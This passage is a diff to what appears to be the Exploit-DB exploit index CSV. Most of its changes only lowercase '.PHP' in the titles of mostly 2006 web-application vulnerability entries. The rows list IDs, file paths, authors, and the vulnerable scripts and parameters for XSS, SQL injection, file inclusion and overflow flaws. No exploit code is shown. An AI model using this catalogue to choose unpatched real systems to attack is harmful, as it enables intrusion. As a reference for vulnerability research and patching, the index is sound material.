Vulnerability",2006-04-14,ALMOKANN3,php,webapps,0 -27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 Language.PHP File Include Vulnerability",2006-04-15,rgod,php,webapps,0 -27644,platforms/php/webapps/27644.txt,"PlanetSearch + Planetsearchplus.PHP Cross-Site Scripting Vulnerability",2006-04-13,d4igoro,php,webapps,0 -27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 Member.PHP SQL Injection Vulnerability",2006-04-13,d4igoro,php,webapps,0 -27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 Index.PHP Cross-Site Scripting Vulnerability",2006-04-13,"Rusydi Hasan",php,webapps,0 -27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x Print.PHP Cross-Site Scripting Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 -27648,platforms/php/webapps/27648.txt,"MODxCMS 0.9.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 -27649,platforms/php/webapps/27649.txt,"MODxCMS 0.9.1 Index.PHP Directory Traversal Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 -27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0 -27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0 +27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 Print.php Cross-Site Scripting Vulnerability",2006-04-14,ALMOKANN3,php,webapps,0 +27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 Language.php File Include Vulnerability",2006-04-15,rgod,php,webapps,0 +27644,platforms/php/webapps/27644.txt,"PlanetSearch + Planetsearchplus.php Cross-Site Scripting Vulnerability",2006-04-13,d4igoro,php,webapps,0 +27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 Member.php SQL Injection Vulnerability",2006-04-13,d4igoro,php,webapps,0 +27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 Index.php Cross-Site Scripting Vulnerability",2006-04-13,"Rusydi Hasan",php,webapps,0 +27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x Print.php Cross-Site Scripting Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 +27648,platforms/php/webapps/27648.txt,"MODxCMS 0.9.1 Index.php Cross-Site Scripting Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 +27649,platforms/php/webapps/27649.txt,"MODxCMS 0.9.1 Index.php Directory Traversal Vulnerability",2006-04-14,"Rusydi Hasan",php,webapps,0 +27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 - Search.php Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0 +27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.php Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 27969,platforms/multiple/dos/27969.c,"Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability",2006-06-05,"Luigi Auriemma",multiple,dos,0 -27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 Common.PHP Remote File Include Vulnerability",2006-06-05,SpC-x,php,webapps,0 +27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 Common.php Remote File Include Vulnerability",2006-06-05,SpC-x,php,webapps,0 27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability",2006-06-05,Kil13r,windows,dos,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0 -27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.PHP Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 -27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.PHP Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0 +27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.php Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 +27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.php Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,Hessam-x,php,webapps,0 -27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 Index.PHP Local File Include Vulnerability",2006-04-17,"Hamid Ebadi",php,webapps,0 +27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 Index.php Local File Include Vulnerability",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 Page Parameter Cross-Site Scripting Vulnerability",2006-04-17,ALMOKANN3,php,webapps,0 -27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 YearCal.PHP Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 +27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 YearCal.php Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 Global Variable Overwrite Vulnerability",2006-04-17,imei,php,webapps,0 27668,platforms/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service Vulnerability",2006-04-10,"Stefan Lochbihler",multiple,dos,0 -27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 Index.PHP Local File Include Vulnerability",2006-04-17,imei,php,webapps,0 +27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 Index.php Local File Include Vulnerability",2006-04-17,imei,php,webapps,0 27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 Playlist Handling Remote Format String Vulnerability",2006-04-18,c0ntexb,linux,dos,0 27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI Cross-Site Scripting Vulnerability",2006-04-18,Qex,cgi,webapps,0 -27673,platforms/php/webapps/27673.txt,"phpLinks 2.1.2/2.1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-04-18,r0t,php,webapps,0 -27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.PHP4 SQL Injection Vulnerability",2006-04-18,"GroundZero Security",php,webapps,0 -27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-18,botan,php,webapps,0 +27673,platforms/php/webapps/27673.txt,"phpLinks 2.1.2/2.1.3 Index.php Cross-Site Scripting Vulnerability",2006-04-18,r0t,php,webapps,0 +27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection Vulnerability",2006-04-18,"GroundZero Security",php,webapps,0 +27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 Index.php Cross-Site Scripting Vulnerability",2006-04-18,botan,php,webapps,0 27676,platforms/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module Cross-Site Scripting Vulnerability",2006-04-19,LoK-Crew,php,webapps,0 27677,platforms/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro Multiple SQL Injection Vulnerabilities",2006-04-19,r0t,php,webapps,0 -27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 User.PHP SQL Injection Vulnerability",2006-04-19,r0t,php,webapps,0 +27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 User.php SQL Injection Vulnerability",2006-04-19,r0t,php,webapps,0 27679,platforms/cgi/webapps/27679.txt,"Visale 1.0 pbpgst.cgi keyval Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27680,platforms/cgi/webapps/27680.txt,"Visale 1.0 pblscg.cgi catsubno Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 pblsmb.cgi listno Parameter XSS",2006-04-19,r0t,cgi,webapps,0 @@ -24777,8 +24777,8 @@ id,file,description,date,author,platform,type,port 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 addlink_lwp.cgi url Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 edit.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 -27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 Showtopic.PHP SQL Injection Vulnerability",2006-04-19,Qex,php,webapps,0 -27688,platforms/php/webapps/27688.txt,"ContentBoxx Login.PHP Cross-Site Scripting Vulnerability",2006-04-19,botan,php,webapps,0 +27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 Showtopic.php SQL Injection Vulnerability",2006-04-19,Qex,php,webapps,0 +27688,platforms/php/webapps/27688.txt,"ContentBoxx Login.php Cross-Site Scripting Vulnerability",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 index.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 @@ -24791,16 +24791,16 @@ id,file,description,date,author,platform,type,port 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 28057,platforms/php/webapps/28057.txt,"Cline Communications Multiple SQL Injection Vulnerabilities",2006-06-17,Liz0ziM,php,webapps,0 -28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.PHP Arbitrary File Upload Vulnerability",2006-06-19,Liz0ziM,php,webapps,0 +28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.php Arbitrary File Upload Vulnerability",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x Web Interface ccmadmin/phonelist.asp pattern Parameter XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x Web Interface ccmuser/logon.asp XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x view_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27700,platforms/windows/dos/27700.py,"VLC Player 2.0.8 - (.m3u) Local Crash PoC",2013-08-19,Asesino04,windows,dos,0 -27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.PHP Remote File Include Vulnerability",2006-04-20,r0t,php,webapps,0 -27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.PHP Cross-Site Scripting Vulnerability",2006-04-20,botan,php,webapps,0 -27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 Member.PHP Cross-Site Scripting Vulnerability",2006-04-20,Qex,php,webapps,0 +27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.php Remote File Include Vulnerability",2006-04-20,r0t,php,webapps,0 +27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.php Cross-Site Scripting Vulnerability",2006-04-20,botan,php,webapps,0 +27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 Member.php Cross-Site Scripting Vulnerability",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking SID Parameter Cross-Site Scripting Vulnerability",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -24810,13 +24810,13 @@ id,file,description,date,author,platform,type,port 27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing Vulnerability",2013-08-19,metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 -28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x Global.PHP SQL Injection Vulnerability",2006-09-26,"HACKERS PAL",php,webapps,0 +28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x Global.php SQL Injection Vulnerability",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/shellcode/27711.txt,"ThWboard 3.0 Index.PHP Cross-Site Scripting Vulnerability",2006-04-20,"CrAzY CrAcKeR",php,shellcode,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 -27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 MWguest.PHP HTML Injection Vulnerability",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 MWguest.php HTML Injection Vulnerability",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27715,platforms/osx/dos/27715.txt,"Apple Mac OS X 10.x - (.zip) Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 -27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 Audio.PHP Information Disclosure Vulnerability",2006-04-21,"Francois Harvey",multiple,remote,0 +27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 Audio.php Information Disclosure Vulnerability",2006-04-21,"Francois Harvey",multiple,remote,0 27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 copy_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 27719,platforms/php/webapps/27719.txt,"phpldapadmin 0.9.8 rename_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 @@ -24826,20 +24826,20 @@ id,file,description,date,author,platform,type,port 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x XMLRPC Server Denial of Service Vulnerability",2006-04-21,"Tanaka Akira",linux,dos,0 27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal Vulnerability",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 -27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 ImageList.PHP Cross-Site Scripting Vulnerability",2006-04-22,nukedx,php,webapps,0 +27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 ImageList.php Cross-Site Scripting Vulnerability",2006-04-22,nukedx,php,webapps,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 LDAP Message Remote Denial of Service Vulnerability",2006-04-24,"Evgeny Legerov",multiple,dos,0 27731,platforms/php/webapps/27731.txt,"photokorn 1.53/1.54 index.php Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27733,platforms/php/webapps/27733.txt,"photokorn 1.53/1.54 print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 -27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 Index.PHP CK Parameter SQL Injection Vulnerability",2006-05-25,IceShaman,php,webapps,0 +27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 Index.php CK Parameter SQL Injection Vulnerability",2006-05-25,IceShaman,php,webapps,0 27737,platforms/php/webapps/27737.txt,"Instant Photo Gallery 1.0 member.php member Parameter XSS",2006-04-25,Qex,php,webapps,0 27738,platforms/php/webapps/27738.txt,"Instant Photo Gallery 1.0 portfolio.php cat_id Parameter XSS",2006-04-25,Qex,php,webapps,0 27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 portfolio_photo_popup.php id Parameter XSS",2006-04-25,Qex,php,webapps,0 27740,platforms/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,php,webapps,0 27741,platforms/php/webapps/27741.txt,"FarsiNews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 -27742,platforms/php/webapps/27742.txt,"DevBB 1.0 Member.PHP Cross-Site Scripting Vulnerability",2006-04-26,Qex,php,webapps,0 +27742,platforms/php/webapps/27742.txt,"DevBB 1.0 Member.php Cross-Site Scripting Vulnerability",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0_Windows Mail MHTML URI Handler Information Disclosure Vulnerability",2006-04-27,codedreamer,windows,dos,0 @@ -24859,16 +24859,16 @@ id,file,description,date,author,platform,type,port 27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail NeoMail.PL SessionID Parameter Cross-Site Scripting Vulnerability",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 27762,platforms/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 -27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0 +27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.php Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow Vulnerability",2006-04-28,"Tavis Ormandy",linux,dos,0 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption Vulnerability",2008-04-28,"Tavis Ormandy",linux,dos,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 -27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 -27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 +27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.php Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 +27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.php Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 -27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0 +27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.php SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 -27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0 +27855,platforms/php/webapps/27855.txt,"Vizra A_Login.php Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x Buffer Overflow Vulnerability",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 @@ -24877,14 +24877,14 @@ id,file,description,date,author,platform,type,port 27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal Vulnerability",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow Vulnerability",2013-08-22,x90c,linux,dos,139 -27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.PHP Remote File Include Vulnerability",2006-04-29,[Oo],php,webapps,0 -27780,platforms/php/webapps/27780.txt,"4images 1.7.1 top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 -27781,platforms/php/webapps/27781.txt,"4images 1.7.1 member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 +27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.php Remote File Include Vulnerability",2006-04-29,[Oo],php,webapps,0 +27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 +27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection Vulnerability",2006-04-29,r0xes,php,webapps,0 -27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.PHP Authentication Bypass Vulnerability",2006-04-29,tugr@,php,webapps,0 -27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.PHP - Remote File Include Vulnerability",2006-05-01,beford,php,webapps,0 -27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability",2006-05-01,[Oo],php,webapps,0 +27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.php Authentication Bypass Vulnerability",2006-04-29,tugr@,php,webapps,0 +27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.php - Remote File Include Vulnerability",2006-05-01,beford,php,webapps,0 +27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.php Remote File Include Vulnerability",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injection Vulnerabilities",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 signup.php referral Parameter XSS",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 members.php id Parameter XSS",2006-05-01,r0t,php,webapps,0 @@ -24892,41 +24892,41 @@ id,file,description,date,author,platform,type,port 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x Filename Handling Remote Format String Vulnerability",2006-05-01,KaDaL-X,linux,dos,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 POS Parameter Cross-Site Scripting Vulnerability",2006-05-01,r0t,php,webapps,0 -27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 Login.PHP Cross-Site Scripting Vulnerability",2006-05-02,"Alexander Klink",php,webapps,0 +27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 Login.php Cross-Site Scripting Vulnerability",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"zenphoto 0.9/1.0 i.php a Parameter XSS",2006-05-02,zone14,php,webapps,0 27796,platforms/php/webapps/27796.txt,"zenphoto 0.9/1.0 index.php Multiple Parameter XSS",2006-05-02,zone14,php,webapps,0 -27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 Stats.PHP Cross-Site Scripting Vulnerability",2006-05-02,almaster,php,webapps,0 -27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 Viewcat.PHP Cross-Site Scripting Vulnerability",2006-05-02,SubjectZero,php,webapps,0 -27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 Server_day_stats.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 -27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 Index.PHP Cross-Site Scripting Vulnerability",2006-05-02,r0t,php,webapps,0 +27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 Stats.php Cross-Site Scripting Vulnerability",2006-05-02,almaster,php,webapps,0 +27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 Viewcat.php Cross-Site Scripting Vulnerability",2006-05-02,SubjectZero,php,webapps,0 +27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 +27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 Index.php Cross-Site Scripting Vulnerability",2006-05-02,r0t,php,webapps,0 27801,platforms/linux/remote/27801.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 Request Routing Table Disclosure",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 27802,platforms/linux/remote/27802.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 RESPONSE Packet Route Injection",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 27803,platforms/php/webapps/27803.txt,"321soft PhP-Gallery 0.9 - index.php path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PhP-Gallery 0.9 index.php path Parameter XSS",2006-05-03,d4igoro,php,webapps,0 27805,platforms/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Stored XSS",2013-08-23,loneferret,windows,remote,0 -27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.PHP Remote File Include Vulnerability",2006-05-03,R@1D3N,php,webapps,0 -27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2006-05-03,almaster,php,webapps,0 +27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.php Remote File Include Vulnerability",2006-05-03,R@1D3N,php,webapps,0 +27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.php Multiple SQL Injection 